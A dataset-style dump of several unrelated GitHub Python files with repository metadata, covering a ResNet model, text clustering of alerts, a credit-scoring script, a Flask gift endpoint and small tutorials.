columnOrder += list(stratum)
for constraint in stratum:
winnerPreferredIndices = ct[(ct[constraint] == 'W') & (ct['Rank'] == 0)].index
for i in winnerPreferredIndices:
ct.loc[i, 'Rank'] = ranking
ct = ct.sort_values('Rank')
columnOrder.append('Rank')
ct = ct.reindex(columns=columnOrder)
return ct.fillna('')
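# Illustrative usage sketch mirroring the workflow described in __init__'s docstring;
# 'data/violations.csv' is a placeholder path.
# bcd = BCD(vtPath='data/violations.csv')
# bcd.generateCtFromVt()   # build the constraint tableau from the violation tableau
# bcd.doBCD()              # compute the stratified constraint hierarchy
# bcd.printStrata()
# print('R-measure:', bcd.calculateRMeasure())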
|
[
"12478985+ellenmdai@users.noreply.github.com"
] |
12478985+ellenmdai@users.noreply.github.com
|
50e8e04c4deab7182142c61d85c30d3bfdd2d297
|
e5478c3d51ab4a2e1408264f13531659c6ccd56e
|
/resnet.py
|
1b7d5061eb6313023fc2717ec04923875e7795d1
|
[] |
no_license
|
qy734504548/cloud-and-cloud-shadow
|
e4b21b0d106183ebd2e58183302a9aa3ee8f83ad
|
79698b661ec14bbf6596d2a0e8ad699fe085504e
|
refs/heads/master
| 2023-01-13T04:52:37.230604
| 2020-11-07T07:59:47
| 2020-11-07T07:59:47
| 310,792,842
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 8,597
|
py
|
import torch
import torch.nn as nn
import torch.utils.model_zoo as model_zoo
__all__ = ['ResNet', 'resnet18', 'resnet34', 'resnet50', 'resnet101',
'resnet152']
model_urls = {
'resnet18': 'https://download.pytorch.org/models/resnet18-5c106cde.pth',
'resnet34': 'https://download.pytorch.org/models/resnet34-333f7ec4.pth',
'resnet50': 'https://download.pytorch.org/models/resnet50-19c8e357.pth',
'resnet101': 'https://download.pytorch.org/models/resnet101-5d3b4d8f.pth',
'resnet152': 'https://download.pytorch.org/models/resnet152-b121ed2d.pth',
}
def conv3x3(in_planes, out_planes, stride=1):
"""3x3 convolution with padding"""
return nn.Conv2d(in_planes, out_planes, kernel_size=3, stride=stride,
padding=1, bias=False)
def conv1x1(in_planes, out_planes, stride=1):
"""1x1 convolution"""
return nn.Conv2d(in_planes, out_planes, kernel_size=1, stride=stride, bias=False)
class BasicBlock(nn.Module):
expansion = 1
    def __init__(self, inplanes, planes, stride=1, downsample=None, spm_on=False):
        # spm_on is accepted (and ignored) so _make_layer can pass it to any block type
super(BasicBlock, self).__init__()
self.conv1 = conv3x3(inplanes, planes, stride)
self.bn1 = nn.BatchNorm2d(planes)
self.relu = nn.ReLU(inplace=True)
self.conv2 = conv3x3(planes, planes)
self.bn2 = nn.BatchNorm2d(planes)
self.downsample = downsample
self.stride = stride
def forward(self, x):
identity = x
out = self.conv1(x)
out = self.bn1(out)
out = self.relu(out)
out = self.conv2(out)
out = self.bn2(out)
if self.downsample is not None:
identity = self.downsample(x)
out += identity
out = self.relu(out)
return out
class SPBlock(nn.Module):
def __init__(self, inplanes, outplanes):
super(SPBlock, self).__init__()
midplanes = outplanes
self.conv1 = nn.Conv2d(inplanes, midplanes, kernel_size=(3, 1), padding=(1, 0), bias=False)
self.bn1 = nn.BatchNorm2d(midplanes)
self.conv2 = nn.Conv2d(inplanes, midplanes, kernel_size=(1, 3), padding=(0, 1), bias=False)
self.bn2 = nn.BatchNorm2d(midplanes)
self.conv3 = nn.Conv2d(midplanes*2, outplanes, kernel_size=1, bias=True)
self.pool1 = nn.AdaptiveAvgPool2d((None, 1))
self.pool2 = nn.AdaptiveAvgPool2d((1, None))
self.relu = nn.ReLU(inplace=False)
def forward(self, x):
_, _, h, w = x.size()
x1 = self.pool1(x)
x1 = self.conv1(x1)
x1 = self.bn1(x1)
x1 = x1.expand(-1, -1, h, w)
x2 = self.pool2(x)
x2 = self.conv2(x2)
x2 = self.bn2(x2)
x2 = x2.expand(-1, -1, h, w)
x = torch.cat([x1,x2],dim=1)
x = self.relu(x)
x = self.conv3(x).sigmoid()
return x
class Bottleneck(nn.Module):
expansion = 4
def __init__(self, inplanes, planes, stride=1, downsample=None,spm_on=False):
super(Bottleneck, self).__init__()
self.conv1 = conv1x1(inplanes, planes)
self.bn1 = nn.BatchNorm2d(planes)
self.conv2 = conv3x3(planes, planes, stride)
self.bn2 = nn.BatchNorm2d(planes)
self.conv3 = conv1x1(planes, planes * self.expansion)
self.bn3 = nn.BatchNorm2d(planes * self.expansion)
self.relu = nn.ReLU(inplace=True)
self.downsample = downsample
self.stride = stride
self.spm = None
if spm_on:
self.spm = SPBlock(planes, planes)
def forward(self, x):
identity = x
out = self.conv1(x)
out = self.bn1(out)
out = self.relu(out)
out = self.conv2(out)
out = self.bn2(out)
out = self.relu(out)
if self.spm is not None:
out = out * self.spm(out)
out = self.conv3(out)
out = self.bn3(out)
if self.downsample is not None:
identity = self.downsample(x)
out += identity
out = self.relu(out)
return out
class ResNet(nn.Module):
def __init__(self, block, layers, num_classes=1000, zero_init_residual=False,spm_on=False):
super(ResNet, self).__init__()
self.spm_on = spm_on
self.inplanes = 64
self.conv1 = nn.Conv2d(3, 64, kernel_size=7, stride=2, padding=3,
bias=False)
self.bn1 = nn.BatchNorm2d(64)
self.relu = nn.ReLU(inplace=True)
self.maxpool = nn.MaxPool2d(kernel_size=3, stride=2, padding=1)
self.layer1 = self._make_layer(block, 64, layers[0])
self.layer2 = self._make_layer(block, 128, layers[1], stride=2)
self.layer3 = self._make_layer(block, 256, layers[2], stride=2)
self.layer4 = self._make_layer(block, 512, layers[3], stride=2)
self.avgpool = nn.AdaptiveAvgPool2d((1, 1))
self.fc = nn.Linear(512 * block.expansion, num_classes)
for m in self.modules():
if isinstance(m, nn.Conv2d):
nn.init.kaiming_normal_(m.weight, mode='fan_out', nonlinearity='relu')
elif isinstance(m, nn.BatchNorm2d):
nn.init.constant_(m.weight, 1)
nn.init.constant_(m.bias, 0)
# Zero-initialize the last BN in each residual branch,
# so that the residual branch starts with zeros, and each residual block behaves like an identity.
# This improves the model by 0.2~0.3% according to https://arxiv.org/abs/1706.02677
if zero_init_residual:
for m in self.modules():
if isinstance(m, Bottleneck):
nn.init.constant_(m.bn3.weight, 0)
elif isinstance(m, BasicBlock):
nn.init.constant_(m.bn2.weight, 0)
def _make_layer(self, block, planes, blocks, stride=1):
downsample = None
if stride != 1 or self.inplanes != planes * block.expansion:
downsample = nn.Sequential(
conv1x1(self.inplanes, planes * block.expansion, stride),
nn.BatchNorm2d(planes * block.expansion),
)
spm_on = False
if planes == 512:
spm_on = self.spm_on
layers = []
layers.append(block(self.inplanes, planes, stride, downsample,spm_on=spm_on))
self.inplanes = planes * block.expansion
for i in range(1, blocks):
if i >= blocks - 1 or planes == 512:
spm_on = self.spm_on
layers.append(block(self.inplanes, planes,spm_on=spm_on))
return nn.Sequential(*layers)
def forward(self, x):
x = self.conv1(x)
x = self.bn1(x)
x = self.relu(x)
x = self.maxpool(x)
x = self.layer1(x)
x = self.layer2(x)
x = self.layer3(x)
x = self.layer4(x)
x = self.avgpool(x)
x = x.view(x.size(0), -1)
x = self.fc(x)
return x
def resnet18(pretrained=False, **kwargs):
"""Constructs a ResNet-18 model.
Args:
pretrained (bool): If True, returns a model pre-trained on ImageNet
"""
model = ResNet(BasicBlock, [2, 2, 2, 2], **kwargs)
if pretrained:
model.load_state_dict(model_zoo.load_url(model_urls['resnet18']))
return model
def resnet34(pretrained=False, **kwargs):
"""Constructs a ResNet-34 model.
Args:
pretrained (bool): If True, returns a model pre-trained on ImageNet
"""
model = ResNet(BasicBlock, [3, 4, 6, 3], **kwargs)
if pretrained:
model.load_state_dict(model_zoo.load_url(model_urls['resnet34']))
return model
def resnet50(pretrained=False, **kwargs):
"""Constructs a ResNet-50 model.
Args:
pretrained (bool): If True, returns a model pre-trained on ImageNet
"""
model = ResNet(Bottleneck, [3, 4, 6, 3], **kwargs)
if pretrained:
model.load_state_dict(model_zoo.load_url(model_urls['resnet50']))
return model
def resnet101(pretrained=False, **kwargs):
"""Constructs a ResNet-101 model.
Args:
pretrained (bool): If True, returns a model pre-trained on ImageNet
"""
model = ResNet(Bottleneck, [3, 4, 23, 3], **kwargs)
if pretrained:
model.load_state_dict(model_zoo.load_url(model_urls['resnet101']))
return model
def resnet152(pretrained=False, **kwargs):
"""Constructs a ResNet-152 model.
Args:
pretrained (bool): If True, returns a model pre-trained on ImageNet
"""
model = ResNet(Bottleneck, [3, 8, 36, 3], **kwargs)
if pretrained:
model.load_state_dict(model_zoo.load_url(model_urls['resnet152']))
return model
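# Illustrative usage sketch; num_classes=2 is an arbitrary placeholder value.
if __name__ == '__main__':
    net = resnet50(pretrained=False, num_classes=2, spm_on=True)
    dummy = torch.randn(1, 3, 224, 224)
    print(net(dummy).shape)  # expected: torch.Size([1, 2])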
|
[
"734504548@qq.com"
] |
734504548@qq.com
|
87d4b4ebc24eaadfa59d9ccf86df148e535339ef
|
b7fa0b3198ced1e775cacff7c091dd13024f4b33
|
/kmeans_bluewarning_analysis.py
|
24458c222996fc4e3b511a6ec89b27f9cc14df0d
|
[] |
no_license
|
Dechuan/BlueWarning_clusters
|
9052b23f56fd72fab414a86d3d057efd382833a9
|
2c5b2c4f7c7cb3b7ee5dde9cf99540e1c73859f2
|
refs/heads/master
| 2020-07-12T12:27:29.346655
| 2019-08-28T01:23:26
| 2019-08-28T01:23:26
| 204,819,731
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,370
|
py
|
from sklearn.feature_extraction.text import CountVectorizer,TfidfTransformer
from sklearn.cluster import KMeans
import jieba
from sklearn import metrics
import pandas as pd
#import os
def kmeans_blue_warning(in_df):
n_clusters=10
abs_score_list = []
ScoreList = []
CountDict = dict()
TrainData = in_df['summary'].tolist()
TrainIndex= in_df['id'].tolist()
TrainTime=in_df['timestamp'].tolist()
TrainKey=in_df['key'].tolist()
vectorizer = CountVectorizer()
X = vectorizer.fit_transform([" ".join([b for b in jieba.lcut(a,cut_all=True)]) for a in TrainData])
word = vectorizer.get_feature_names()
print('word:',word)
transformer = TfidfTransformer()
tfidf = transformer.fit_transform(X.toarray())
    km = KMeans(n_clusters=n_clusters)
km.fit(tfidf.toarray())
for i in tfidf.toarray():
score = km.score(i.reshape(1, -1))
ScoreList.append(score)
abs_score_list.append(abs(score))
sort_score_list = sorted(abs_score_list)
scorelen = len(sort_score_list)
for i in sort_score_list:
count = 0
for j in sort_score_list:
if j <= i:
count = count + 1
CountDict[i] = count / scorelen
bin_start=0
ModelDict = {}
Risk = []
Summary = []
Category = []
Variance = []
i=0
while bin_start < len(km.labels_):
scores = ScoreList[bin_start]
cdfscore = CountDict[abs(scores)]
Risk.append(round(1 / (1.0001 - cdfscore), 0))
#Summary.append(TrainData[bin_start])
Category.append(km.labels_[bin_start])
#Variance.append(scores)
bin_start = bin_start+ 1
while i<len(Risk):
if Risk[i]>=1000:
Risk[i]='1000+'
elif (Risk[i]<1000)&(Risk[i]>=100):
Risk[i]='100+'
elif (Risk[i]<100)&(Risk[i]>=10):
Risk[i]='10+'
elif Risk[i]<10:
Risk[i]='1+'
i=i+1
ModelDict = {'id': TrainIndex,'risk': Risk,'category':Category,'summary':TrainData,'timestamp':TrainTime,'key':TrainKey}
out_df= pd.DataFrame(ModelDict, columns=['id', 'risk','category','summary','timestamp','key'])
return out_df
#dataFile = 'data/OUTPUT.csv'
dataFile='data/alert2.csv'
data = pd.read_csv(dataFile,encoding="gb2312")
print(data)
result = kmeans_blue_warning(data)
result.to_csv("result/keys_TFIDF.csv",index=False)
|
[
"songciting@163.com"
] |
songciting@163.com
|
bfaeee67905c14d2f409f6f49ffa39866004282a
|
69974e2912b95495b23b9912001ddf3a1f71cbe9
|
/Learn_Args&Kwargs.py
|
66cf3cbb717d12770636a9b4ad0863e70fd31691
|
[] |
no_license
|
AbhinavNmdo/Python
|
84fe7b7512defa210742f2384925d4e16cb79579
|
8a66592478111487df9af7f16ca0b127935dad22
|
refs/heads/master
| 2023-07-16T15:17:24.122926
| 2021-08-31T05:59:25
| 2021-08-31T05:59:25
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 516
|
py
|
def name(*args, **kwargs):  # Always follow this order ==> (normal parameters, then *args, then **kwargs)
print("This is args statement")
for item in args:
print(item)
print("This is kwargs statement")
for i, j in kwargs.items():
print(f"{i} is a {j}")
names = ["Abhay", "Ashu", "PapaJi", "MummyJi"]  # Keep adding items to this list; it will not raise an error
print(name(*names))
names2 = {"Abhay": "Programmer", "Ashu": "CA", "PapaJi": "WebDeveloper", "MummyJi": "HouseWife"}
print(name(**names2))
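# Illustrative sketch of the ordering rule from the comment above:
# normal (positional) parameters first, then *args, then **kwargs.
def describe(greeting, *args, **kwargs):
    print(greeting)
    for item in args:
        print("extra positional:", item)
    for key, value in kwargs.items():
        print(f"{key} is a {value}")
describe("Team:", "Abhay", "Ashu", PapaJi="WebDeveloper")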
|
[
"abhaynam22@gmail.com"
] |
abhaynam22@gmail.com
|
7e3e293ac3834b01926d52d452d737a1aaa352ae
|
c836d305745c0d024c75f053f619f4e3193ce978
|
/gelin_group.py
|
a071017c051f2bfaf844c2b8bfb4f873cd949500
|
[] |
no_license
|
eguinosa/minimax-hex
|
5fc87421528eb5929994f329629edfa58b80d3a7
|
9adaed2afe857deb517dbeeb5ffd97da5ca83bb6
|
refs/heads/master
| 2023-06-04T15:59:51.065212
| 2021-05-21T02:10:56
| 2021-05-21T02:10:56
| 379,028,278
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,776
|
py
|
# Gelin Eguinosa Rosique
# C-511
class Group:
    """Class to represent a group of stones with the same color"""
def __init__(self, game, player, positions):
"""
Save the location of the stones of the group, the board and the player.
        Look at how many rows or columns it covers, to see how close the player
        is to winning.
"""
self.positions = positions
self.game = game
self.player = player
# Checking the length of the group
min_pos, max_pos, group_length = self.__length()
self.min_pos = min_pos
self.max_pos = max_pos
self.length = group_length
def empty_neighbours(self):
"""Look for all the empty cells that are next to the stones of the group"""
result_neighbours = []
search_map = [[False] * self.game.size for _ in range(self.game.size)]
for position in self.positions:
x = position[0]
y = position[1]
search_map[x][y] = True
for nx, ny in self.game.neighbour(x, y):
if search_map[nx][ny]:
continue
search_map[nx][ny] = True
if self.game[nx, ny] == '.':
result_neighbours.append((nx, ny))
        # Sort the neighbours by how much they move the player closer to the edges
result_neighbours.sort(key=lambda pos: self.__pos_advantage(pos))
return result_neighbours
def __pos_advantage(self, pos):
"""
        Gives a value determining how good it would be for the player to play
        in this position of the board.
-1: if it expands the group one step
0: if it is in the edge of the group
positive number: if it is inside the edges of the group
"""
if self.player == 'W':
y = pos[1]
min_y = self.min_pos[1]
max_y = self.max_pos[1]
if y < min_y or y > max_y:
return -1
if y == min_y or y == max_y:
return 0
distance_to_edge = max(y-min_y, max_y - y)
return distance_to_edge
# self.player == 'B'
x = pos[0]
min_x = self.min_pos[0]
max_x = self.max_pos[0]
if x < min_x or x > max_x:
return -1
if x == min_x or x == max_x:
return 0
distance_to_edge = max(x - min_x, max_x - x)
return distance_to_edge
def __length(self):
"""
        Look at how many of the rows ('B' player) or columns ('W' player) this group
        covers, to know how close the player is to winning the game. If the player has
        covered all the rows or columns in a connected group, the player wins the game.
:return: the number of columns or rows the group covers.
"""
if self.player == 'W':
y_min = min(self.positions, key=lambda pos: pos[1])
y_max = max(self.positions, key=lambda pos: pos[1])
y_length = y_max[1] - y_min[1] + 1
return y_min, y_max, y_length
# self.player == 'B'
x_min = min(self.positions, key=lambda pos: pos[0])
x_max = max(self.positions, key=lambda pos: pos[0])
x_length = x_max[0] - x_min[0] + 1
return x_min, x_max, x_length
def connected_group(game, player, visited_area):
"""Search for all the connected stones of the same player"""
positions = []
neighbours = []
# Flag to stop the double for
stop = False
for x in range(game.size):
for y in range(game.size):
if visited_area[x][y]:
continue
elif game[x, y] != player:
visited_area[x][y] = True
continue
else:
# game[x, y] == player and not visited_area[x][y]:
visited_area[x][y] = True
positions.append((x, y))
neighbours += list(game.neighbour(x, y))
stop = True
if stop:
break
if stop:
break
# No player found on the board
if not positions:
found_group = False
return found_group, None
# Search for all the positions of the player connected to the one in group
while neighbours:
x, y = neighbours.pop(0)
if visited_area[x][y]:
continue
elif game[x, y] != player:
visited_area[x][y] = True
continue
# game[x, y] == player and not visited_area[x][y]:
visited_area[x][y] = True
positions.append((x, y))
neighbours += list(game.neighbour(x, y))
found_group = True
result_group = Group(game, player, positions)
return found_group, result_group
|
[
"eguinosa@gmail.com"
] |
eguinosa@gmail.com
|
405ac1f07f1a750299e9f7a772a78a0b4ac771b0
|
3c64db21529ebcd9d5612c49d71852df5f794043
|
/classifier.py
|
9bcc9db015e4ba09bf4456db797884b22c059073
|
[] |
no_license
|
theerawatramchuen/AutoX_Kaggle_Rasnet50
|
265fdc17950e8304ac62554aaf7f49802401489b
|
b9dd0e891bfe15a9b0f79ea82a98bc630230d9e3
|
refs/heads/master
| 2020-06-11T05:58:28.369710
| 2019-07-07T23:06:10
| 2019-07-07T23:06:10
| 193,869,489
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,338
|
py
|
# coding: utf-8
# ### Global Constants
# Fixed for our Cats & Dogs classes
NUM_CLASSES = 2
# Fixed for Cats & Dogs color images
CHANNELS = 3
IMAGE_RESIZE = 224
RESNET50_POOLING_AVERAGE = 'avg'
DENSE_LAYER_ACTIVATION = 'softmax'
OBJECTIVE_FUNCTION = 'categorical_crossentropy'
## Common accuracy metric for all outputs, but can use different metrics for different output
LOSS_METRICS = ['accuracy']
# Using 1 to easily manage mapping between test_generator & prediction for submission preparation
BATCH_SIZE_TESTING = 1
import numpy as np
import pandas as pd
from tensorflow.python.keras.applications import ResNet50
from tensorflow.python.keras.models import Sequential
from tensorflow.python.keras.layers import Dense
# ### ResNet50
resnet_weights_path = 'resnet50_weights_tf_dim_ordering_tf_kernels_notop.h5'
# ### Define Our Transfer Learning Network Model Consisting of 2 Layers
model = Sequential()
# 1st layer as the lumpsum weights from resnet50_weights_tf_dim_ordering_tf_kernels_notop.h5
# NOTE that this layer will be set below as NOT TRAINABLE, i.e., use it as is
model.add(ResNet50(include_top = False, pooling = RESNET50_POOLING_AVERAGE, weights = resnet_weights_path))
# 2nd layer as Dense for 2-class classification, i.e., dog or cat using SoftMax activation
model.add(Dense(NUM_CLASSES, activation = DENSE_LAYER_ACTIVATION))
# Say not to train first layer (ResNet) model as it is already trained
model.layers[0].trainable = False
model.summary()
# ### Compile Our Transfer Learning Model
from tensorflow.python.keras import optimizers
sgd = optimizers.SGD(lr = 0.01, decay = 1e-6, momentum = 0.9, nesterov = True)
model.compile(optimizer = 'sgd', loss = OBJECTIVE_FUNCTION, metrics = LOSS_METRICS)
# Load saved weight file
model.load_weights("working/best.hdf5")
# ### Prepare Keras Data Generators
from keras.applications.resnet50 import preprocess_input
from keras.preprocessing.image import ImageDataGenerator
image_size = IMAGE_RESIZE
# preprocessing_function is applied on each image but only after re-sizing & augmentation (resize => augment => pre-process)
# Each of the keras.applications.resnet* preprocess_input functions MOSTLY means BATCH NORMALIZATION (applied on each batch) to stabilize the inputs to nonlinear activation functions
# Batch Normalization helps in faster convergence
data_generator = ImageDataGenerator(preprocessing_function=preprocess_input)
test_generator = data_generator.flow_from_directory(
directory = 'blind/',
target_size = (image_size, image_size),
batch_size = BATCH_SIZE_TESTING,
class_mode = None,
shuffle = False,
seed = 123
)
## Reset before each call to predict
test_generator.reset()
pred = model.predict_generator(test_generator, steps = len(test_generator), verbose = 1)
predicted_class_indices = np.argmax(pred, axis = 1)
results_df = pd.DataFrame(
{
'id': pd.Series(test_generator.filenames),
'label': pd.Series(predicted_class_indices)
})
#results_df['id'] = results_df.id.str.extract('(\d+)')
#results_df['id'] = pd.to_numeric(results_df['id'], errors = 'coerce')
results_df.sort_values(by='id', inplace = True)
## Save Result to csv file
results_df.to_csv('submission.csv', index=False)
results_df.head()
# ### References
#
# 1. [Transfer Learning by Dan B](https://www.kaggle.com/dansbecker/transfer-learning)
|
[
"noreply@github.com"
] |
noreply@github.com
|
23e1c139d1f5d6d1538a825da39ce84355784a5c
|
eaf993358c740e2e86df4a0cd06beed51786c045
|
/credictcard/model.py
|
8ba3b4dfe8ab95e8cc3914d77a335152733a44e1
|
[] |
no_license
|
mzjdy/credict
|
de6bc7c7ae72e7e1a49fc3407a124bdb34b2fd77
|
901dced9d6455c314839bcfb5334c1d8702a5f99
|
refs/heads/master
| 2020-04-18T00:56:41.462673
| 2018-05-01T09:10:38
| 2018-05-01T09:10:38
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,421
|
py
|
from sklearn.cross_validation import train_test_split
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import matplotlib
#%matplotlib inline
import seaborn as sns
from numpy import log
from sklearn.linear_model import LogisticRegression
from sklearn.metrics import roc_curve, auc
import math
data = pd.read_csv('cs_training.csv')
data.columns = ['Unnamed: 0', 'Y','x1','x2','x3','x4','x5','x6','x7','x8','x9','x10']
data = data[data.x2>20]
data = data[data.x2<91]
data = data[data.x3<50]
data = data[data.x7<50]
index1 = data[data['x5'].isnull()].index
ageList = data['x2'].unique()
fillDict = {}
for age in ageList:
fillDict[age] = data[data.x2==age]['x5'].median()
def fill_monthIncome(data,index1):
for i in index1:
age = data.loc[i,'x2']
fill_value = fillDict[age]
data.loc[i,'x5'] = fill_value
fill_monthIncome(data, index1)
data.to_csv('clean_data.csv')
data = pd.read_csv('clean_data.csv')
names = ['x1','x2','x3','x4','x5','x6','x7','x8','x9','x10']
X = data.loc[:,['x1','x2','x3','x4','x5','x6','x7','x8','x9','x10']]
Y = data['Y']
list1 = list(data.x2.unique())
list1 = sorted(list1)
IncomeMedian = []
for i in list1:
result = data[data.x2==i]['x5'].median()
IncomeMedian.append(result)
def get_value(data,feature):
test1 = list(data[feature].unique())
test1 = sorted(test1)
return test1
total_good = len(data)-data['Y'].sum()
total_bad = data['Y'].sum()
total_ratio = data['Y'].sum()/(len(data)-data['Y'].sum())
def compute_woe1(data,feature,n):
woe_dict ={}
iv = 0
total_list = data[feature].value_counts()
index1 = get_value(data,feature)
for i in index1:
if i <= n:
bad = data[data[feature]==i]['Y'].sum()
good = total_list[i] - bad
result = bad/good
woe = log(result/total_ratio)
woe_dict[i] = woe
iv_test = (bad/total_bad - good/total_good)*woe
iv = iv+iv_test
else:
bad = data[data[feature]>=i]['Y'].sum()
good = len(data[data[feature]>=i]['Y']) - bad
result = bad/good
woe = log(result/total_ratio)
woe_dict[i] = woe
iv_test = (bad/total_bad - good/total_good)*woe
iv = iv+iv_test
break
return woe_dict,iv
data.x1 = pd.qcut(data.x1,10,labels=[0,1,2,3,4,5,6,7,8,9])
data.x2 = pd.cut(data.x2,bins=[20,25,30,35,40,50,60,70,90],labels=[0,1,2,3,4,5,6,7])
data.x4 = pd.qcut(data.x4,20,labels=[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19])
data.x5 = pd.qcut(data.x5,20,labels=[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19])
woe_x1,IV1 = compute_woe1(data,'x1',100)
woe_x2,IV2 = compute_woe1(data,'x2',100)
woe_x3,IV3 = compute_woe1(data,'x3',6)
woe_x4,IV4 = compute_woe1(data,'x4',100)
woe_x5,IV5 = compute_woe1(data,'x5',100)
woe_x6,IV6 = compute_woe1(data,'x6',20)
woe_x7,IV7 = compute_woe1(data,'x7',5)
woe_x8,IV8 = compute_woe1(data,'x8',7)
woe_x9,IV9 = compute_woe1(data,'x9',4)
woe_x10,IV10 = compute_woe1(data,'x10',5)
index1 = data[data.x3>=4].index
data.loc[index1,'x3'] = 4
index2 = data[data.x7>=4].index
data.loc[index2,'x7'] = 4
index3 = data[data.x9>=4].index
data.loc[index3,'x9'] = 4
IVList = [IV1, IV2, IV3, IV4, IV5, IV6, IV7, IV8, IV9, IV10]
index=['x1','x2','x3','x4','x5','x6','x7','x8','x9','x10']
fig1 = plt.figure(1)
ax1 = fig1.add_subplot(1, 1, 1)
x = np.arange(len(index))+1
ax1.bar(x, IVList, width=0.4)
ax1.set_xticks(x)
ax1.set_xticklabels(index, rotation=0, fontsize=12)
ax1.set_ylabel('IV(Information Value)', fontsize=14)
for a, b in zip(x, IVList):
plt.text(a, b + 0.01, '%.4f' % b, ha='center', va='bottom', fontsize=10)
plt.show()
def convert_woe(feature,woe):
list1 = []
for i in data[feature]:
if i in woe.keys():
list1.append(woe[i])
else:
list1.append(woe[(len(woe)-1)])
return list1
data.x1 = convert_woe('x1',woe_x1)
data.x2 = convert_woe('x2', woe_x2)
data.x3 = convert_woe('x3', woe_x3)
data.x7 = convert_woe('x7', woe_x7)
data.x9 = convert_woe('x9', woe_x9)
data = data.drop(['x4','x5','x6','x8','x10'],axis=1)
data = data.loc[:,['Y','x1','x2','x3','x7','x9']]
Y = data.Y
X = data.loc[:,['x1','x2','x3','x7','x9']]
X_train, X_test, Y_train, Y_test = train_test_split(X, Y, test_size=0.3, random_state=0)
lr = LogisticRegression(C=0.1)
lr.fit(X_train,Y_train)
#lr.coef_
y_pred = lr.predict(X_test)
fpr, tpr, thresholds = roc_curve(Y_test,y_pred)
roc_auc = auc(fpr,tpr)
# Plot ROC
plt.title('Receiver Operating Characteristic')
plt.plot(fpr, tpr, 'b',label='AUC = %0.2f'% roc_auc)
plt.legend(loc='lower right')
plt.plot([0,1],[0,1],'r--')
plt.xlim([-0.1,1.0])
plt.ylim([-0.1,1.01])
plt.ylabel('True Positive Rate')
plt.xlabel('False Positive Rate')
plt.show()
coe=[9.738849,0.638002,0.505995,1.032246,1.790041,1.131956]
p = 20 / math.log(2)
q = 600 - 20 * math.log(20) / math.log(2)
baseScore = round(q + p * coe[0], 0)
data.x1 = convert_woe('x1',woe_x1)
data.x2 = convert_woe('x2', woe_x2)
data.x3 = convert_woe('x3', woe_x3)
data.x7 = convert_woe('x7', woe_x7)
data.x9 = convert_woe('x9', woe_x9)
data.x1 = round(data.x1*p*coe[1])
data.x2 = round(data.x2*p*coe[2])
data.x3 = round(data.x3*p*coe[3])
data.x7 = round(data.x7*p*coe[4])  # coe has only 6 entries; following the pattern above, x7 maps to coe[4], not coe[7]
|
[
"noreply@github.com"
] |
noreply@github.com
|
e63e563efcb703fca24d599bdd39bad1a435a2e9
|
261830843d9474eff5ad951eb75e273e2ecfd2b1
|
/ginger/app/api/v1/gift.py
|
b05b7333fd567547817376a010ad138a10d54962
|
[] |
no_license
|
shuaibikong/RESTful
|
1d1c21ac77ccd0d6928a5a9170b4b3f931f13d7e
|
e0dfd73b79537b1cfc232f7cb3b724c935225a4b
|
refs/heads/master
| 2022-12-13T02:16:00.567817
| 2018-11-08T10:25:41
| 2018-11-08T10:25:41
| 147,464,952
| 0
| 0
| null | 2021-05-06T19:24:45
| 2018-09-05T05:34:19
|
Python
|
UTF-8
|
Python
| false
| false
| 675
|
py
|
from flask import g
from app.libs.error_code import Success, DuplicateGift  # DuplicateGift is raised below; assumed to live in error_code
from app.libs.redprint import Redprint
from app.libs.token_auth import auth
from app.models.base import db
from app.models.book import Book
from app.models.gift import Gift
api = Redprint('gift')
@api.route('/<isbn>', methods=['POST'])
@auth.login_required
def create(isbn):
uid = g.user.uid
with db.auto_commit():
Book.query.filter_by(isbn=isbn).first_or_404()
gift = Gift.query.filter_by(isbn=isbn, uid=uid).first()
if gift:
raise DuplicateGift()
gift = Gift()
gift.isbn = isbn
gift.uid = uid
db.session.add(gift)
return Success()
|
[
"40583736+shuaibikong@users.noreply.github.com"
] |
40583736+shuaibikong@users.noreply.github.com
|
fd11361d5c3dec153900e545c8908017550eba3e
|
eaf921d22d1d42d70b5f49d8f97f42e27ad5c16f
|
/Chap03/use_regex.py
|
31c3dfff2b10eb17e284911ebc69fc852daa7927
|
[] |
no_license
|
atastet/Python_openclassroom
|
0f3ff87c44527edde4722a311bf3bbece123edfd
|
37992f3eb8937b7480aedbbd83152451eaa8c6b8
|
refs/heads/master
| 2020-03-19T13:48:26.439159
| 2019-01-30T20:25:30
| 2019-01-30T20:25:30
| 136,595,991
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 143
|
py
|
# -*-coding:Utf-8 -*
import re
chaine = ""
exp = r"^0[0-9]([ .-]?[0-9]{2}){4}$"
while re.search(exp, chaine) is None:
    chaine = raw_input("Numero")
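# For reference (added): the pattern accepts French-style numbers such as
# "0123456789", "01 23 45 67 89" or "01-23-45-67-89", and the loop keeps
# prompting until the input starts with 0 and contains exactly ten digits.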
|
[
"Anthony@macbook-pro-de-anthony.home"
] |
Anthony@macbook-pro-de-anthony.home
|
58ea7cf638432fef55e251a1f9aa71b69ef8417b
|
590aab339221662f547f8dbd45dfed336821a8cb
|
/cally.py
|
18097070d37bf5cfbb7d8c5ce7a092071a23a84d
|
[
"Apache-2.0"
] |
permissive
|
krish2487/cally
|
d4fdea1d80903d697af292acabd5e994567b3346
|
f043437f122b5b71179fc178f24180b8ee679270
|
refs/heads/master
| 2022-01-14T14:03:41.090612
| 2018-04-06T09:31:01
| 2018-04-06T09:31:01
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 23,708
|
py
|
#!/usr/bin/python
#
# Copyright 2018, Eelco Chaudron
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# File name:
# mkcg.py
#
# Description:
# Make callgraph .dot file from GCC's rtl data
#
# Author:
